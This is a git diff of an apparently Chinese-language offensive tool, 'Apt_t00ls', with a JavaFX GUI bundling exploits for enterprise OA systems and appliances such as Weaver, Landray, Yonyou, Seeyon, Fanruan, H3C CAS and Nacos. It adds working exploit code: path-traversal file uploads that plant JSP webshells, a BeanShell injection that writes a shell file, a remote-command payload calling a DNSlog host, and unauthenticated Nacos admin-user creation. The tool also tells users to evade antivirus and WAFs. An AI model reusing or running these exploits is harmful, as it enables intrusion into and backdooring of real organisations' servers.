diff --git a/.DS_Store b/.DS_Store
deleted file mode 100644
index 5fb69aa..0000000
Binary files a/.DS_Store and /dev/null differ
diff --git a/.gitignore b/.gitignore
deleted file mode 100644
index 63a9dff..0000000
--- a/.gitignore
+++ /dev/null
@@ -1,7 +0,0 @@
-#idea
-.idea
-*.iml
-
-
-#maven编译
-target
diff --git a/README.md b/README.md
index f9aff13..14b7fe2 100644
--- a/README.md
+++ b/README.md
@@ -1,12 +1,32 @@
# Apt_t00ls
+
高危漏洞利用工具
+
---
-## 开心指数
+## 贡献者名单
-[](https://starchart.cc/White-hua/Apt_t00ls)
+
---
+
泛微:
e-cology workrelate_uploadOperation.jsp-RCE (默认写入冰蝎4.0.3aes)
e-cology page_uploadOperation.jsp-RCE (暂未找到案例 仅供检测poc)
@@ -15,6 +35,7 @@ e-cology KtreeUploadAction-RCE (默认写入冰蝎4.0.3aes)
e-cology WorkflowServiceXml-RCE (默认写入内存马 冰蝎 3.0 beta11)
e-office logo_UploadFile.php-RCE (默认写入冰蝎4.0.3aes)
e-office10 OfficeServer.php-RCE (默认写入冰蝎4.0.3aes)
+e-office8 fileupload-RCE (默认写入冰蝎4.0.3aes)
e-office doexecl.php-RCE (写入phpinfo,需要getshell请自行利用)
e-mobile_6.6 messageType.do-SQlli (sqlmap利用,暂无直接shell的exp)
@@ -22,6 +43,7 @@ e-mobile_6.6 messageType.do-SQlli (sqlmap利用,暂无直接shell的exp)
landray_datajson-RCE (可直接执行系统命令)
landray_treexmlTmpl-RCE (可直接执行系统命令)
landray_sysSearchMain-RCE (多个payload,写入哥斯拉 3.03 密码 yes)
+landrayoa_fileupload_sysSearch-RCE (默认写入冰蝎4.0.3aes)
用友:
yongyou_chajet_RCE (用友畅捷通T+ rce 默认写入哥斯拉 Cshap/Cshap_aes_base64)
@@ -29,7 +51,9 @@ yongyou_NC_FileReceiveServlet-RCE 反序列化rce (默认写入冰蝎4.0.3aes)
yongyou_NC_bsh.servlet.BshServlet_RCE (可直接执行系统命令)
yongyou_NC_NCFindWeb 目录遍历漏洞 (可查看是否存在历史遗留webshell)
yongyou_GRP_UploadFileData-RCE(默认写入冰蝎4.0.3aes)
-yongyou_KSOA_imageUpload-RCE (默认写入冰蝎4.0.3aes)
+yongyou_GRP_AppProxy-RCE(默认写入冰蝎4.0.3aes)
+yongyou_KSOA_imageUpload-RCE (默认写入冰蝎4.0.3aes)
+yongyou_KSOA_Attachmentupload-RCE (默认写入冰蝎4.0.3aes)
万户:
wanhuoa_OfficeServer-RCE(默认写入冰蝎4.0.3aes)
@@ -42,11 +66,16 @@ wanhuoa_fileUploadController-RCE(默认写入冰蝎4.0.3aes)
seeyonoa_main_log4j2-RCE (仅支持检测,自行开启ladp服务利用)
seeyonoa_wpsAssistServlet-RCE(默认写入冰蝎4.0.3aes)
seeyonoa_htmlofficeservlet-RCE(默认写入冰蝎4.0.3aes)
-seeyonoa_ajaxBypass-RCE(写入天蝎 密码sky)
+seeyonreport_svg_upload-RCE(默认写入冰蝎4.0.3aes)
+seeyonoa_ajaxBypass-RCE(写入天蝎 密码sky)
+seeyon_testsqli-RCE(仅检测是否存在漏洞页面)
通达:
tongdaoa_getdata-RCE (直接执行系统命令)
-tongdaoa_apiali-RCE (默认写入冰蝎4.0.3aes)
+tongdaoa_apiali-RCE (默认写入冰蝎4.0.3aes)
+
+帆软:
+fanruan_save_svg-RCE (默认写入冰蝎4.0.3aes)
中间件:
IIS_PUT_RCE (emm暂时没办法getshell 仅支持检测 java没有MOVE方法)
@@ -54,7 +83,9 @@ IIS_PUT_RCE (emm暂时没办法getshell 仅支持检测 java没有MOVE方法)
安全设备:
综合安防_applyCT_fastjson-RCE(仅支持检测,自行使用ladp服务利用)
网康下一代防火墙_ngfw_waf_route-RCE(写入菜刀shell 密码:nishizhu)
+H3C cas_cvm_upload-RCE (默认写入冰蝎4.0.3aes)
网御星云账号密码泄露
+阿里nacos未授权任意用户添加
使用截图:
@@ -86,8 +117,15 @@ Tasklist敏感进程检测
可直接提Issu
或加我wx进群交流,微信请备注apt
-
+
+
+---
+
+
+## 开心指数
+
+[](https://starchart.cc/White-hua/Apt_t00ls)
---
## 免责声明
本工具仅面向合法授权的企业安全建设行为,如您需要测试本工具的可用性,请自行搭建靶机环境。
diff --git a/image/I0veD.jpg b/image/I0veD.jpg
new file mode 100644
index 0000000..593457a
Binary files /dev/null and b/image/I0veD.jpg differ
diff --git a/image/luckyh.jpg b/image/luckyh.jpg
new file mode 100644
index 0000000..ba47d78
Binary files /dev/null and b/image/luckyh.jpg differ
diff --git a/src/main/java/Main.java b/src/main/java/Main.java
index 623985b..c775c84 100644
--- a/src/main/java/Main.java
+++ b/src/main/java/Main.java
@@ -1,4 +1,5 @@
import cn.hutool.core.io.resource.ResourceUtil;
+import java.net.URL;
import java.util.Objects;
import javafx.application.Application;
import javafx.fxml.FXMLLoader;
@@ -7,13 +8,14 @@ import javafx.scene.Scene;
import javafx.stage.Stage;
public class Main extends Application {
+ public Main() {
+ }
- @Override
- public void start(Stage primaryStage) throws Exception{
- Parent root = FXMLLoader.load(ResourceUtil.getResource("fxml/Main.fxml"));
+ public void start(Stage primaryStage) throws Exception {
+ Parent root = (Parent)FXMLLoader.load(ResourceUtil.getResource("fxml/Main.fxml"));
primaryStage.setTitle("APT");
- Scene scene = new Scene(root,1280,910);
- scene.getStylesheets().add(Objects.requireNonNull(Main.class.getResource("/css/main.css")).toExternalForm());
+ Scene scene = new Scene(root, 1280.0, 910.0);
+ scene.getStylesheets().add(((URL)Objects.requireNonNull(Main.class.getResource("/css/main.css"))).toExternalForm());
primaryStage.setScene(scene);
primaryStage.show();
}
diff --git a/src/main/java/controller/AttController.java b/src/main/java/controller/AttController.java
index 81e862f..8fe2c63 100644
--- a/src/main/java/controller/AttController.java
+++ b/src/main/java/controller/AttController.java
@@ -82,7 +82,7 @@ public class AttController {
Runtime run = Runtime.getRuntime();
//path:文件路径
try {
- run.exec("notepad " + shell.Jsppath);
+ run.exec(shell.open + shell.Jsppath);
} catch (Exception e) {
e.printStackTrace();
}
@@ -93,7 +93,7 @@ public class AttController {
Runtime run = Runtime.getRuntime();
//path:文件路径
try {
- run.exec("notepad " + shell.Jspxpath);
+ run.exec(shell.open + shell.Jspxpath);
} catch (Exception e) {
e.printStackTrace();
}
@@ -104,7 +104,7 @@ public class AttController {
Runtime run = Runtime.getRuntime();
//path:文件路径
try {
- run.exec("notepad " + shell.Asppath);
+ run.exec(shell.open + shell.Asppath);
} catch (Exception e) {
e.printStackTrace();
}
@@ -115,7 +115,7 @@ public class AttController {
Runtime run = Runtime.getRuntime();
//path:文件路径
try {
- run.exec("notepad " + shell.Aspxpath);
+ run.exec(shell.open + shell.Aspxpath);
} catch (Exception e) {
e.printStackTrace();
}
@@ -126,7 +126,7 @@ public class AttController {
Runtime run = Runtime.getRuntime();
//path:文件路径
try {
- run.exec("notepad " + shell.Phppath);
+ run.exec(shell.open + shell.Phppath);
} catch (Exception e) {
e.printStackTrace();
}
@@ -137,7 +137,7 @@ public class AttController {
Runtime run = Runtime.getRuntime();
//path:文件路径
try {
- run.exec("notepad " + shell.dnspath);
+ run.exec(shell.open + shell.dnspath);
} catch (Exception e) {
e.printStackTrace();
}
@@ -148,7 +148,7 @@ public class AttController {
Runtime run = Runtime.getRuntime();
//path:文件路径
try {
- run.exec("notepad " + shell.dnscofpath);
+ run.exec(shell.open + shell.dnscofpath);
} catch (Exception e) {
e.printStackTrace();
}
@@ -270,60 +270,26 @@ public class AttController {
@FXML
public void initialize() {
- textArea_info.setText(
- "------------------------------------目前EXP如下--------------------------------");
- textArea_info.appendText(
- "\ne-cology workrelate_uploadOperation.jsp-RCE (默认写入冰蝎4.0.3aes)");
- textArea_info.appendText("\ne-cology page_uploadOperation.jsp-RCE (暂未找到案例 仅供检测poc)");
- textArea_info.appendText("\ne-cology WorkflowServiceXml-RCE (默认写入内存马 冰蝎 3.0 beta11)");
- textArea_info.appendText("\ne-cology BshServlet-RCE (可直接执行系统命令)");
- textArea_info.appendText("\ne-cology KtreeUploadAction-RCE (默认写入冰蝎4.0.3aes)");
- textArea_info.appendText("\ne-office logo_UploadFile.php-RCE (默认写入冰蝎4.0.3aes)");
- textArea_info.appendText("\ne-office doexecl.php-RCE (写入phpinfo,需要getshell请自行利用)");
- textArea_info.appendText("\ne-office10 OfficeServer.php-RCE (默认写入冰蝎4.0.3aes)");
- textArea_info.appendText("\ne-mobile_6.6 messageType.do-SQlli (sqlmap利用,暂无直接shell的exp)");
textArea_info.appendText(
- "\n\nlandray_sysSearchMain-RCE (多个payload,写入哥斯拉 3.03 密码 yes)");
- textArea_info.appendText("\nlandray_treexmlTmpl-RCE (可直接执行系统命令)");
- textArea_info.appendText("\nlandray_datajson-RCE (可直接执行系统命令)");
-
- textArea_info.appendText("\n\nwanhu_OfficeServer-RCE (可直接执行系统命令)");
- textArea_info.appendText("\nwanhu_smartUpload-RCE (可直接执行系统命令)");
- textArea_info.appendText("\nwanhuoa_OfficeServerservlet-RCE(默认写入冰蝎4.0.3aes)");
- textArea_info.appendText("\nwanhu_DocumentEdit-SQlli (mssql数据库 可 os-shell)");
- textArea_info.appendText("\nwanhuoa_fileUploadController-RCE (默认写入冰蝎4.0.3aes)");
-
- textArea_info.appendText("\ntongdaoa_getdata-RCE (直接执行系统命令)");
- textArea_info.appendText("\ntongdaoa_apiali-RCE (默认写入冰蝎4.0.3aes)");
+ "\n---------------------------(禁止未授权恶意攻击)-------------------------");
textArea_info.appendText(
- "\n\nyongyou_chajet-RCE (用友畅捷通T+ rce 默认写入哥斯拉 Cshap/Cshap_aes_base64)");
- textArea_info.appendText("\nyongyou_NC_bsh.servlet.BshServlet-RCE (可直接执行系统命令)");
- textArea_info.appendText(
- "\nyongyou_NC_NCFindWeb 目录遍历漏洞 (可查看是否存在历史遗留webshell)");
- textArea_info.appendText("\nyongyou_NC_FileReceiveServlet-RCE (默认写入冰蝎4.0.3aes)");
- textArea_info.appendText("\nyongyou_GRP_UploadFileData-RCE (默认写入冰蝎4.0.3aes)");
- textArea_info.appendText("\nyongyou_KSOA_imageUpload-RCE (默认写入冰蝎4.0.3aes)");
-
- textArea_info.appendText("\n\nseeyonoa_main_log4j2-RCE (仅支持检测)");
- textArea_info.appendText("\nseeyonoa_wpsAssistServlet-RCE (默认写入冰蝎4.0.3aes)");
- textArea_info.appendText("\nseeyonoa_htmlofficeservlet-RCE (默认写入冰蝎4.0.3aes)");
- textArea_info.appendText("\nseeyonoa_ajaxBypass-RCE (写入天蝎 密码sky)");
+ "\n\n 本工具仅供学习研究及合法授权下渗透测试!!!!!\n");
textArea_info.appendText(
- "\n\nIIS_PUT_RCE (emm暂时没办法getshell 仅支持检测 java没有MOVE方法)");
-
- textArea_info.appendText("\n\n综合安防_applyCT_fastjson-RCE(仅支持检测,自行使用ladp服务利用)");
- textArea_info.appendText("\n网康下一代防火墙_ngfw_waf_route-RCE(写入菜刀shell 密码:nishizhu)");
- textArea_info.appendText("\n网御星云-上网行为管理账号密码泄露_Leadsec_ACM");
+ "\n 本工具webshell写入判断依据为md5 在修改shll内容时请勿删除md5");
+ textArea_info.appendText(
+ "\n config目录中shell开头文件均为 冰蝎4.0.3 aes生成webshell");
+ textArea_info.appendText(
+ "\n gsl.jsp为哥斯拉4.01 jsp aes 默认密码密钥 ");
+ textArea_info.appendText(
+ "\n chajet目录下为畅捷通编译好shell文件");
+ textArea_info.appendText(
+ "\n dnslog文件夹下为部分漏洞所需dnslog回显测试所用,请自行修改dnslog文件");
textArea_info.appendText(
- "\n\n-------------------------------(禁止未授权恶意攻击)-----------------------------");
-
- textArea_info.appendText("\n\n---------小提醒,工具所用shell为冰蝎默认aes加密生成shell"
- + "\n 若工具提示shell写入成功 但访问不存在或连接不上 请考虑免杀,修改shell位置在工具目录下Apt_config"
- + "\n 工具判断shell是否写入依据md5 可自行打开查看 修改shell请保留md5 否则会影响漏洞判断");
+ "\n\n---------------------------(禁止未授权恶意攻击)-------------------------");
//设置自动换行
textArea_info.setWrapText(true);
@@ -361,6 +327,9 @@ public class AttController {
case "安全设备":
listview_kinds.setItems(Kinds_Exp.equipment());
break;
+ case "CMS":
+ listview_kinds.setItems(Kinds_Exp.cms());
+ break;
}
updateListView(listview_kinds.getItems().get(0));
}
@@ -399,18 +368,37 @@ public class AttController {
case "通达-OA":
choiceBox_exp.setItems(exp.tongdaoa());
break;
+ case "帆软-OA":
+ choiceBox_exp.setItems(exp.fanruan());
+ break;
+
case "IIS":
choiceBox_exp.setItems(exp.iis());
break;
+
+
+
case "海康":
choiceBox_exp.setItems(exp.hik());
break;
+ case "H3C":
+ choiceBox_exp.setItems(exp.h3c());
+ break;
case "奇安信":
choiceBox_exp.setItems(exp.qianxin());
break;
case "网御星云":
choiceBox_exp.setItems(exp.wangyu());
break;
+
+
+
+ case "Alibaba":
+ choiceBox_exp.setItems(exp.Alibaba());
+ break;
+
+
+
default:
System.out.println(selectedItem);
// 当所选项还没有exp给默认选项
diff --git a/src/main/java/controller/TsklistController.java b/src/main/java/controller/TsklistController.java
index e5acd40..be5d460 100644
--- a/src/main/java/controller/TsklistController.java
+++ b/src/main/java/controller/TsklistController.java
@@ -34,7 +34,7 @@ public class TsklistController {
String finallist = shell.ifexe(resultlist22, exelist);
String res;
try {
- res = new String(finallist.getBytes("gbk"));
+ res = new String(finallist.getBytes("utf-8"));
textArea_res.setText(res);
} catch (UnsupportedEncodingException e) {
e.printStackTrace();
diff --git a/src/main/java/exp/cms/nacos_Creatuser.java b/src/main/java/exp/cms/nacos_Creatuser.java
new file mode 100644
index 0000000..f8079bf
--- /dev/null
+++ b/src/main/java/exp/cms/nacos_Creatuser.java
@@ -0,0 +1,47 @@
+package exp.cms;
+
+import core.Exploitlnterface;
+import javafx.application.Platform;
+import javafx.scene.control.TextArea;
+import utils.HttpTools;
+import utils.Response;
+
+import java.util.HashMap;
+
+public class nacos_Creatuser implements Exploitlnterface {
+ @Override
+ public Boolean checkVul(String url, TextArea textArea) {
+ return att(url, textArea);
+ }
+
+ @Override
+ public Boolean getshell(String url, TextArea textArea) {
+ Platform.runLater(() -> {
+ textArea.appendText("\n 该漏洞无法getshell");
+ });
+ return false;
+ }
+
+ private boolean att(String url , TextArea textArea){
+ HashMap head = new HashMap();
+ head.put("User-Agent","Nacos-Server");
+ String poststring = "";
+ Response post = HttpTools.post(url + "/nacos/v1/auth/users?username=nishizhu&password=zhu@123", poststring, head, "utf-8");
+
+ if(post.getCode() == 200 && post.getText().contains("create user ok")){
+ Platform.runLater(() -> {
+ textArea.appendText("\n nacos任意用户添加漏洞存在 用户添加成功,账号:nishizhu 密码:zhu@123");
+ });
+ return true;
+ }else {
+ Platform.runLater(() -> {
+ textArea.appendText("\n nacos任意用户添加-漏洞不存在 (出现误报请联系作者)");
+ });
+ return false;
+ }
+ }
+
+
+
+
+}
diff --git a/src/main/java/exp/equipment/Sangfor/ad_passwd.java b/src/main/java/exp/equipment/Sangfor/ad_passwd.java
new file mode 100644
index 0000000..7b316e5
--- /dev/null
+++ b/src/main/java/exp/equipment/Sangfor/ad_passwd.java
@@ -0,0 +1,27 @@
+package exp.equipment.Sangfor;
+
+import cn.hutool.http.HttpRequest;
+import core.Exploitlnterface;
+import javafx.scene.control.TextArea;
+import utils.HttpTools;
+import utils.Response;
+
+import java.util.HashMap;
+
+public class ad_passwd implements Exploitlnterface {
+ @Override
+ public Boolean checkVul(String url, TextArea textArea) {
+ return null;
+ }
+
+ @Override
+ public Boolean getshell(String url, TextArea textArea) {
+ return null;
+ }
+
+ private Boolean att(String url, TextArea textArea){
+ Response response = HttpTools.get(url, new HashMap(), "utf-8");
+ return false;
+ }
+}
+
diff --git a/src/main/java/exp/equipment/h3c/cas_cvm_upload.java b/src/main/java/exp/equipment/h3c/cas_cvm_upload.java
new file mode 100644
index 0000000..4d66daf
--- /dev/null
+++ b/src/main/java/exp/equipment/h3c/cas_cvm_upload.java
@@ -0,0 +1,76 @@
+package exp.equipment.h3c;
+
+import core.Exploitlnterface;
+import javafx.application.Platform;
+import javafx.scene.control.TextArea;
+import utils.HttpTools;
+import utils.Response;
+import utils.shell;
+
+import java.util.HashMap;
+
+public class cas_cvm_upload implements Exploitlnterface {
+ @Override
+ public Boolean checkVul(String url, TextArea textArea) {
+ return att(url, textArea);
+ }
+
+ @Override
+ public Boolean getshell(String url, TextArea textArea) {
+ return shell(url, textArea);
+ }
+
+ private boolean att(String url,TextArea textArea){
+ String payload = shell.readFile(shell.Testpath);
+
+ HashMap head = new HashMap<>();
+ head.put("Content-range","bytes 0-10/20");
+ head.put("Accept-Encoding","gzip, deflate");
+ head.put("Content-type","");
+
+ Response post = HttpTools.post(url + "/cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/nishizhu.txt&name=222", payload, head, "utf-8");
+
+ Response response = HttpTools.get(url + "/cas/js/lib/buttons/nishizhu.txt", new HashMap(), "utf-8");
+ if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+ Platform.runLater(() -> {
+ textArea.appendText(
+ "\n 漏洞存在 测试文件写入成功 \n " + url + "/cas/js/lib/buttons/nishizhu.txt"
+ );
+ });
+ return true;
+ }else {
+ Platform.runLater(() -> {
+ textArea.appendText("\n cas_cvm云计算管理平台-RCE-漏洞不存在 (出现误报请联系作者)");
+ });
+ return false;
+ }
+ }
+
+ private boolean shell(String url,TextArea textArea){
+ String payload = shell.readFile(shell.Jsppath);
+
+ HashMap head = new HashMap<>();
+ head.put("Content-range","bytes 0-10/20");
+ head.put("Accept-Encoding","gzip, deflate");
+ head.put("Content-type","");
+
+ Response post = HttpTools.post(url + "/cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/nishizhu.jsp&name=222", payload, head, "utf-8");
+
+ Response response = HttpTools.get(url + "/cas/js/lib/buttons/nishizhu.txt", new HashMap(), "utf-8");
+ if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+ Platform.runLater(() -> {
+ textArea.appendText(
+ "\n 漏洞存在 webshell文件写入成功 \n " + url + "/cas/js/lib/buttons/nishizhu.jsp"
+ );
+ });
+ return true;
+ }else {
+ Platform.runLater(() -> {
+ textArea.appendText("\n 疑似杀软查杀 请手动复现");
+ });
+ return false;
+ }
+ }
+
+
+}
diff --git a/src/main/java/exp/oa/fanruan/fanruan_save_svg.java b/src/main/java/exp/oa/fanruan/fanruan_save_svg.java
new file mode 100644
index 0000000..3d7f5dc
--- /dev/null
+++ b/src/main/java/exp/oa/fanruan/fanruan_save_svg.java
@@ -0,0 +1,77 @@
+package exp.oa.fanruan;
+
+import core.Exploitlnterface;
+import javafx.application.Platform;
+import javafx.scene.control.TextArea;
+import utils.HttpTools;
+import utils.Response;
+import utils.shell;
+
+import java.util.HashMap;
+
+public class fanruan_save_svg implements Exploitlnterface {
+ @Override
+ public Boolean checkVul(String url, TextArea textArea) {
+ return att(url, textArea);
+ }
+
+ @Override
+ public Boolean getshell(String url, TextArea textArea) {
+ return shell(url, textArea);
+ }
+
+ private Boolean att(String url, TextArea textArea){
+ HashMap head = new HashMap<>();
+ head.put("Content-Type", "text/xml;charset=UTF-8");
+ String payload = "{\"__CONTENT__\": \"" + shell.readFile(shell.Testpath).replace("\"","\\\"") + "\", \"__CHARSET__\": \"UTF-8\"}";
+ Response post = HttpTools.post(url + "/WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/nishizhu.svg.jsp", payload, head, "utf-8");
+
+ if(post.getCode() == 200){
+ Response response = HttpTools.get(url + "/WebReport/nishizhu.svg.jsp", new HashMap(), "utf-8");
+ if (response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+ Platform.runLater(() -> {
+ textArea.appendText("\n 漏洞存在 测试文件写入成功\n " + url + "/nishizhu.svg.jsp");
+ });
+ return true;
+ }else {
+ Platform.runLater(() -> {
+ textArea.appendText("\n 疑似杀软查杀 请手动复现");
+ });
+ return false;
+ }
+ }else {
+ Platform.runLater(() -> {
+ textArea.appendText("\n fanruan-design_save_svg-RCE-漏洞不存在 (出现误报请联系作者)");
+ });
+ return false;
+ }
+ }
+
+ private Boolean shell(String url, TextArea textArea){
+ HashMap head = new HashMap<>();
+ head.put("Content-Type", "text/xml;charset=UTF-8");
+ String payload = "{\"__CONTENT__\": \"" + shell.readFile(shell.Jsppath).replace("\"","\\\"") + "\", \"__CHARSET__\": \"UTF-8\"}";
+ Response post = HttpTools.post(url + "/WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/nishidazhu.svg.jsp", payload, head, "utf-8");
+
+ if(post.getCode() == 200){
+ Response response = HttpTools.get(url + "/WebReport/nishizhu.svg.jsp", new HashMap(), "utf-8");
+ if (response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+ Platform.runLater(() -> {
+ textArea.appendText("\n 漏洞存在 webshell文件写入成功\n " + url + "/nishidazhu.svg.jsp");
+ });
+ return true;
+ }else {
+ Platform.runLater(() -> {
+ textArea.appendText("\n 疑似杀软查杀 请手动复现");
+ });
+ return false;
+ }
+ }else {
+ Platform.runLater(() -> {
+ textArea.appendText("\n 疑似杀软查杀 请手动复现");
+ });
+ return false;
+ }
+ }
+
+}
diff --git a/src/main/java/exp/oa/landrayoa/landray_datajson.java b/src/main/java/exp/oa/landrayoa/landray_datajson.java
index fb0b38e..2f80969 100644
--- a/src/main/java/exp/oa/landrayoa/landray_datajson.java
+++ b/src/main/java/exp/oa/landrayoa/landray_datajson.java
@@ -1,9 +1,7 @@
package exp.oa.landrayoa;
import core.Exploitlnterface;
-
import java.util.HashMap;
-
import javafx.application.Platform;
import javafx.scene.control.TextArea;
import utils.HttpTools;
@@ -29,7 +27,7 @@ public class landray_datajson implements Exploitlnterface {
shell.readFile(shell.dnspath).replace("http://", "");
String payload = "/data/sys-common/datajson.js?s_bean=sysFormulaSimulateByJS&script=function%20test()%7B%20return%20java.lang.Runtime%7D;r=test();r.getRuntime().exec(%22ping%20-c%204%20" + shell.getRandomString() + "." + dnslog + "%22)&type=1";
Response response = HttpTools.get(url + payload, new HashMap(), "utf-8");
- if (response.getCode() == 200 && response.getText().contains("success")) {
+ if (response.getCode() == 200 && response.getText().contains("模拟通过")) {
Platform.runLater(() -> {
textArea.appendText("\n漏洞存在 请自行利用\n" + url + payload);
});
diff --git a/src/main/java/exp/oa/landrayoa/landray_fileupload_sysSearch.java b/src/main/java/exp/oa/landrayoa/landray_fileupload_sysSearch.java
new file mode 100644
index 0000000..3876513
--- /dev/null
+++ b/src/main/java/exp/oa/landrayoa/landray_fileupload_sysSearch.java
@@ -0,0 +1,75 @@
+package exp.oa.landrayoa;
+
+import core.Exploitlnterface;
+import javafx.application.Platform;
+import javafx.scene.control.TextArea;
+import sun.misc.BASE64Encoder;
+import utils.HttpTools;
+import utils.Response;
+import utils.shell;
+
+import java.util.HashMap;
+
+public class landray_fileupload_sysSearch implements Exploitlnterface {
+
+ @Override
+ public Boolean checkVul(String url, TextArea textArea) {
+ Boolean att = att(url, textArea);
+ return att;
+ }
+
+ @Override
+ public Boolean getshell(String url, TextArea textArea) {
+ return shell(url,textArea);
+ }
+
+ private Boolean att(String url,TextArea textArea){
+ HashMap head = new HashMap<>();
+ head.put("Content-Type","application/x-www-form-urlencoded");
+
+ String ok_result = (new BASE64Encoder()).encodeBuffer(shell.readFile(shell.Testpath).getBytes()).trim();
+ String t1 = shell.gbEncoding("import java.lang.*;import java.io.*;Class cls=Thread.currentThread().getContextClassLoader().loadClass(\"bsh.Interpreter\");String path=cls.getProtectionDomain().getCodeSource().getLocation().getPath();File f=new File(path.split(\"WEB-INF\")[0]+\"/loginzhu.jsp\");f.createNewFile();FileOutputStream fout=new FileOutputStream(f);fout.write(new sun.misc.BASE64Decoder().decodeBuffer(\"" + ok_result + "\"));fout.close()");
+ String payload = "var={\"body\":{\"file\":\"/sys/search/sys_search_main/sysSearchMain.do?method=editParam\"}}&fdParemNames=12&fdParameters="+ t1 +"";
+
+ Response post = HttpTools.post(url + "/sys/ui/extend/varkind/custom.jsp", payload, head, "utf-8");
+ Response response = HttpTools.get(url + "/loginzhu.jsp", new HashMap(), "utf-8");
+ if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+ Platform.runLater(() -> {
+ textArea.appendText("\n 漏洞存在 测试文件写入成功 \n " + url + "/loginzhu.jsp");
+ });
+ return true;
+ }else {
+ Platform.runLater(() -> {
+ textArea.appendText("\n landrayoa_fileupload_sysSearch-RCE-漏洞不存在 (出现误报请联系作者)");
+ });
+ return false;
+ }
+ }
+
+
+ private Boolean shell(String url,TextArea textArea){
+ HashMap head = new HashMap<>();
+ head.put("Content-Type","application/x-www-form-urlencoded");
+
+ String rdf = shell.readFile(shell.Jsppath).trim();
+ String ok_result = (new BASE64Encoder()).encodeBuffer(rdf.getBytes());
+ String t1 = shell.gbEncoding("import java.lang.*;import java.io.*;Class cls=Thread.currentThread().getContextClassLoader().loadClass(\"bsh.Interpreter\");String path=cls.getProtectionDomain().getCodeSource().getLocation().getPath();File f=new File(path.split(\"WEB-INF\")[0]+\"/loginzhuda.jsp\");f.createNewFile();FileOutputStream fout=new FileOutputStream(f);fout.write(new sun.misc.BASE64Decoder().decodeBuffer(\"" + ok_result + "\"));fout.close()");
+ String payload = "var={\"body\":{\"file\":\"/sys/search/sys_search_main/sysSearchMain.do?method=editParam\"}}&fdParemNames=12&fdParameters="+ t1 +"";
+
+ Response post = HttpTools.post(url + "/sys/ui/extend/varkind/custom.jsp", payload, head, "utf-8");
+ Response response = HttpTools.get(url + "/loginzhuda.jsp", new HashMap(), "utf-8");
+ if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+ Platform.runLater(() -> {
+ textArea.appendText("\n 漏洞存在 shell文件写入成功 \n " + url + "/loginzhuda.jsp");
+ });
+ return true;
+ }else {
+ Platform.runLater(() -> {
+ textArea.appendText("\n getshell失败!!!waf查杀!!!请进行免杀!!!!!");
+ });
+ return false;
+ }
+ }
+
+
+}
diff --git a/src/main/java/exp/oa/seeyonoa/seeyon_testsqli.java b/src/main/java/exp/oa/seeyonoa/seeyon_testsqli.java
new file mode 100644
index 0000000..6945884
--- /dev/null
+++ b/src/main/java/exp/oa/seeyonoa/seeyon_testsqli.java
@@ -0,0 +1,43 @@
+package exp.oa.seeyonoa;
+
+import core.Exploitlnterface;
+import javafx.application.Platform;
+import javafx.scene.control.TextArea;
+import utils.HttpTools;
+import utils.Response;
+
+import java.util.HashMap;
+
+public class seeyon_testsqli implements Exploitlnterface {
+ @Override
+ public Boolean checkVul(String url, TextArea textArea) {
+ return att(url,textArea);
+ }
+
+ @Override
+ public Boolean getshell(String url, TextArea textArea) {
+ Platform.runLater(() -> {
+ textArea.appendText("\n 该漏洞暂不支持getshell 请手动利用");
+ });
+ return false;
+ }
+
+ private boolean att(String url , TextArea textArea){
+ Response response = HttpTools.get(url + "/yyoa/common/js/menu/test.jsp", new HashMap(), "utf-8");
+ if (response.getCode() == 200) {
+ Platform.runLater(() -> {
+ textArea.appendText("\n 漏洞页面存在 请自行查看是否存在注入");
+ });
+ return true;
+ }else {
+ Platform.runLater(() -> {
+ textArea.appendText("\n seeyon_testsqli-RCE-漏洞不存在 (出现误报请联系作者)");
+ });
+ return false;
+ }
+ }
+
+
+
+}
+
diff --git a/src/main/java/exp/oa/seeyonoa/seeyonreport_svg_upload.java b/src/main/java/exp/oa/seeyonoa/seeyonreport_svg_upload.java
new file mode 100644
index 0000000..6f07617
--- /dev/null
+++ b/src/main/java/exp/oa/seeyonoa/seeyonreport_svg_upload.java
@@ -0,0 +1,77 @@
+package exp.oa.seeyonoa;
+
+import core.Exploitlnterface;
+import javafx.application.Platform;
+import javafx.scene.control.TextArea;
+import utils.HttpTools;
+import utils.Response;
+import utils.shell;
+
+import java.util.HashMap;
+
+public class seeyonreport_svg_upload implements Exploitlnterface {
+ @Override
+ public Boolean checkVul(String url, TextArea textArea) {
+ return att(url, textArea);
+ }
+
+ @Override
+ public Boolean getshell(String url, TextArea textArea) {
+ return shell(url, textArea);
+ }
+
+ private Boolean att(String url, TextArea textArea){
+ HashMap head = new HashMap<>();
+ head.put("Content-Type", "text/xml;charset=UTF-8");
+ String payload = "{\"__CONTENT__\": \"" + shell.readFile(shell.Testpath).replace("\"","\\\"") + "\", \"__CHARSET__\": \"UTF-8\"}";
+ Response post = HttpTools.post(url + "/seeyonreport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../WebReport/nishizhu.svg.jsp", payload, head, "utf-8");
+
+ if(post.getCode() == 200){
+ Response response = HttpTools.get(url + "/seeyonreport/WebReport/nishizhu.svg.jsp", new HashMap(), "utf-8");
+ if (response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+ Platform.runLater(() -> {
+ textArea.appendText("\n 漏洞存在 测试文件写入成功\n " + url + "/seeyonreport/WebReport/nishizhu.svg.jsp");
+ });
+ return true;
+ }else {
+ Platform.runLater(() -> {
+ textArea.appendText("\n 疑似杀软查杀 请手动复现");
+ });
+ return false;
+ }
+ }else {
+ Platform.runLater(() -> {
+ textArea.appendText("\n seeyonoa_seeyonreport_upload-RCE-漏洞不存在 (出现误报请联系作者)");
+ });
+ return false;
+ }
+ }
+
+ private Boolean shell(String url, TextArea textArea){
+ HashMap head = new HashMap<>();
+ head.put("Content-Type", "text/xml;charset=UTF-8");
+ String payload = "{\"__CONTENT__\": \"" + shell.readFile(shell.Jsppath).replace("\"","\\\"") + "\", \"__CHARSET__\": \"UTF-8\"}";
